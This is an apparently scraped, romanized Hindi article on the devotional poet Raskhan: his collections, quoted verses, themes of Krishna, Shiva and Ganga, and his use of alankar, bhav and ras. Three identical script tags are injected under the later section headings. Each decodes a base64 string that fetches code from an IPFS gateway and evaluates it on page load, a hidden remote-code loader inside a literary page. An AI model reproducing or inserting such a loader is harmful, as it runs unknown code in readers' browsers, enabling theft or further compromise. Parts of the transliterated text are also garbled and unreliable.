rasakhan ki kavitaoan ke do sangrah prakashit hue haian- 'sujan rasakhan' aur 'premavatika'. 'sujan rasakhan' mean 139 savaiye aur kavitt hai. 'premavatika' mean 52 dohe haian, jinamean prem ka b da anootha niroopan kiya gaya hai. rasakhani ke saras savaiy sachamuch bejo d haian. savaiya ka doosara nam 'rasakhan' bhi p d gaya hai. shuddh brajabhasha mean rasakhani ne premabhakti ki atyant suandar prasadamayi rachanaean ki haian. yah ek uchch koti ke bhakt kavi the, isamean sandeh nahian.

manush hauan to vahi rasakhani basauan gokul gaanv ke gvalan.
jo pasu hauan to kaha basu mero charauan nit nand ki dhenu manjharan.
pahan hauan to vahi giri ko jo dharayau kar chhatr purandar dharan.
jo khag hauan basero karauan mil kalindi-kool-kadamb ki daran..

sahityik visheshataean

saiyyad ibrahim rasakhan ke kavy ke adhar bhagavan shrikrishna haian. rasakhan ne unaki hi lilaoan ka gan kiya hai. unake poore kavy- rachana mean bhagavan shrikrishna ki bhakti ki gee hai. isase bhi age badhate hue rasakhan ne suphijm (tasavvuph) ko bhi bhagavan shrikrishna ke madhyam se hi prakat kiya hai. isase yah kaha ja sakata hai ki ve samajik evan apasi sauhard ke kitane himayati the.

holi varnan

krishna bhakt kaviyoan ki tarah rasakhan ne bhi krishna ji ki ullasamayi lilaoan ka vistarapoorvak varnan kiya hai. unhoanne apane padoan mean krishna ko gopiyoan ke sath holi khelate hue dikhaya gaya hai, jinamean krishna gopiyoan ko kianbhago dete haian. gopiyaan phalgun ke sath krishna ke avagunoan ki charcha karate hue kahati haian ki krishna ne holi khel kar ham mean kam- vasana jagrit kar di haian. pichakari tatha ghamar se hamean kianbhago diya hai. is tarah hamara har bhi toot gaya hai. rasakhan apane pad mean krishna ko maryada hin chitrit kiya hai:-

avat lal gulal lie mag sune mili ik nar navini.
tyoan rasakhani jagai hiye yatoo moj kiyo man mahi adhini.
sari phati sukumari hati, aangiya daraki saraki rang bhini.
lal gulal lagai ke aank rijhai bida kari dini.

hari shankari

rasakhan hari aur shankar ko abhinn manate the-

ik aur kirit base dusari disi lagan ke gan gajat ri.
murali madhuri dhuni adhik oth pe adhik nad se bajat ri.
rasakhani pitanbar ek kandha par vaghanbar rajat ri.
kod dekhad sangam le bu daki nikas yah bhekh soan chhajat ri.

shiv stuti

rasakhan ke padoan mean krishna ke alava kee aur devataoan ka jikr milata hai. shiv ki sahaj kripaluta ki or sanket karate hue kahate haian ki unaki kripa drishti sanpoorn dukhoan ka nash karane vali hai-

yah dekhi dhatoore ke pat chabat au gat soan dhooli lagavat hai. chahuan or jata aantakai latake phani soan kaphani paharavat haian. rasakhani geee chitavaian chit de tinake dukhaduand bhajavat haian. gajakhal kapal ki mal visal sogal bajavat avat hai.

ganga garima

ganga ki mahima ke varnan ki paripati ka anusaran karate hue rasakhan ne bhi ganga ki stooti mean ek pad hi sahi, magar likha hai --

bed ki aushad khai kachhu n karai bahu sanjam ri suni mosean.
to jalapan kiyau rasakhani sajivan jani liyo ras tertri.
eri sughamee bhagirathi nit pathy apathy bane tohian pose.
ak dhatooro chabat phire vish khat phirai siv teai bharosean.

prem tatha bhakti

prem tatha bhakti ke kshetr mean bhi rasakhan ne prem ka vishadh aur vyapak chitran kiya hai. radha aur krishna prem vatika ke masi masin haian. prem ka marg kamal tantoo ke saman naguk aur atidhar ke saman kathin hai. atyant sidha bhi hai aur tedha bhi hai. bina premanubhooti ke anand ka anubhav nahian hota. bina prem ka bij hriday mean nahian upajata hai. jnan, karm, upasana sab ahankar ke mool haian. bina prem ke dridh nishchay nahian hota. rasakhan dvara pratipadit prem adarshoan se anuprerit hai. rasakhan ne prem ka spasht rup mean chitran kiya hai. prem ki paribhasha, pahachan, prem ka prabhav, prem prati ke sadhan evan prem ki parakashtha prem vatika mean dikhaee p dati hai. rasakhan dvara pratipadit prem laukik prem se bahut ooancha hai. rasakhan ne 52 dohoan mean prem ka jo svarup prastut kiya hai, vah poornataya maulik haian.

va lakuti aru kamariya par raj tihooanpur ko taji darau.
athahu siddhi navaan nidhi ko sukh nand ki gai charaee bisarau.
e rasakhani gavai in nainan te bj ke ban- bag niharai.
kotika yah kalaghot ke dham karil ki kuanjan upavarau.

baly varnan

dhoori bhare ati shobhit shyam joo, taisi bani sir sundar choti.
khelat khat phiraian aangana, pag paianjaniya kati piri kachhauti..
va chhavi ko rasakhan vilokat, varat kam kalanidhi koti.
kag ke bhag kaha kahie hari hath soan le gayo makhan roti..

kala paksh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kavi ne kahian chamatkar lane ke lie alankaroan ko barabas thooansane ki cheshta nahian ki hai. bhav aur ras ke pravah par bhi usaki drishti kendrit rahi hai. bhavoan aur rasoan ki abhivyakti ko utkrisht banane ke lie hi alankaroan ki yojana ki gee hai. uchit sthan par alankaroan ka grahan kiya gaya hai. unhean door tak khianchane ka vyarth prayas nahian kiya gaya hai. auchity ke anusar thik sthan par unaka tyag kar diya gaya hai. rasakhan dvara prayukt alankar apane 'alankar' nam ko sarthak karate haian. shabdalankaroan mean anupras aur arthalankaroan mean upama, utpreksha evan roopak ki nibandhana mean kavi ne vishesh roochi dikhaee hai. b di kushalata ke sath unaka sannivesh kiya hai, unhean is vidhan mean poorn saphalata mili hai. alankaroan ki sundar yojana se unaki kavita ka kala-paksh nissandeh nikhar aya hai.

bhav paksh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

rasakhan ke kavy mean chh: sthayi bhavoan ki nibandhana milati hai- rati, nirved, utsah, has, vatsaly aur bhakti. yah bat dhyan dene yogy hai ki unhoanne paranparaprathita char sthayi bhavoan ko hi gaurav diya hai, jinamean anyatam bhav rati ka hai. krodh, jugupta, vismay, shok aur bhay ki upeksha ka mool karan yah pratit hota hai ki in bhavoan ka rati se mel nahian hai. rasakhan premi jiv the, atev unhoanne apani kavita mean tin prakar ke rati bhavoan ki rati, vatsaly aur bhakti ki vyanjana ki; jo bhav inamean vishesh sahayak ho sakate the unhean yathasthan abhivyakti kiya. doosara karan yah bhi hai ki unaki rachana muktak hai; atev prabandh kavy ki bhaanti usamean sabhi prakar ke bhavoan ka sannivesh avashyak bhi nahian hai.

ras sanyojan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
